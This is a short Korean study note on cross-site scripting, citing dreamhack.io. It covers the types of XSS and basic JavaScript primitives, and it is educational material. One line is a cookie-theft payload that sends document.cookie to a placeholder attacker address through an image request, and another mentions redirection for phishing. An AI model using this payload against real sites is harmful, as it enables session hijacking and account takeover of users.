Cross-Site-Scripting (XSS)

* Cross Site Scripting (XSS)

클라이언트 사이드 취약점 중 하나

공격자가 웹 리소스에 악성 스크립트를 삽입해 이용자의 웹 브라우저에서 해당 스크립트 실행

특정 계정의 세션 정보 탈취, 해당 계정으로 임의 기능 수행

 

Stored XSS: 악성 스크립트가 서버에 저장되고 서버의 응답에 담겨옴

Reflected XSS: 악성 스크립트가 URL에 삽입되고 서버의 응답에 담겨옴

DOM-based XSS: 악성 스크립트가 URL Fragment에 삽입됨

Universal XSS: 클라이언트의 브라우저 혹은 플러그인에서 발생하는 취약점, SOP 정책 우회

 

document.cookie

// 현재 페이지의 쿠키 (return type: string)

 

document.cookie = "name=test;";

// 쿠키 생성 (key: name, value: test)

 

new Image().src = "공격자 주소/?cookie=" + document.cookie;

// new Image()는 이미지를 생성하는 함수이며, src는 이미지의 주소를 지정
// "http://공격자 주소/?cookie=현재 페이지 쿠키" 공격자 주소로 현재 페이지의 쿠키 요청

 

document.write("Hello");

// 이용자의 페이지에 데이터를 삽입

 

location.href = "http://";

// 이용자의 위치 변경. 피싱 공격 등으로 사용됨.

window.open("http://")

// 새 창 열기

 

* Stored XSS

서버의 데이터베이스 또는 파일 등의 형태로 저장된 악성 스크립트를 조회할 때 발생하는 XSS

대표적으로 게시물과 댓글에 악성 스크립트를 포함해 업로드하는 방식이 있음

 

* Reflected XSS

서버가 악성 스크립트가 담긴 요청을 출력할 때 발생

대표적으로 게시판 서비스에서 작성된 게시물을 조회하기 위한 검색창에서 스크립트를 포함해 검색하는 방식이 있음

검색 문자열에 악성 스크립트가 포함되어 있다면 Reflected XSS가 발생

Reflected XSS는 Stored XSS와는 다르게 URL과 같은 이용자의 요청에 의해 발생

따라서 공격을 위해서는 다른 이용자를 악성 스크립트가 포함된 링크에 접속하도록 유도해야 함

링크 직접 전달은 악성 스크립트 포함 여부를 이용자가 눈치챌 수 있기 때문에 주로 Click Jacking 또는 Open Redirect 등 다른 취약점과 연계하여 사용

 

 

<출처>

- https://dreamhack.io/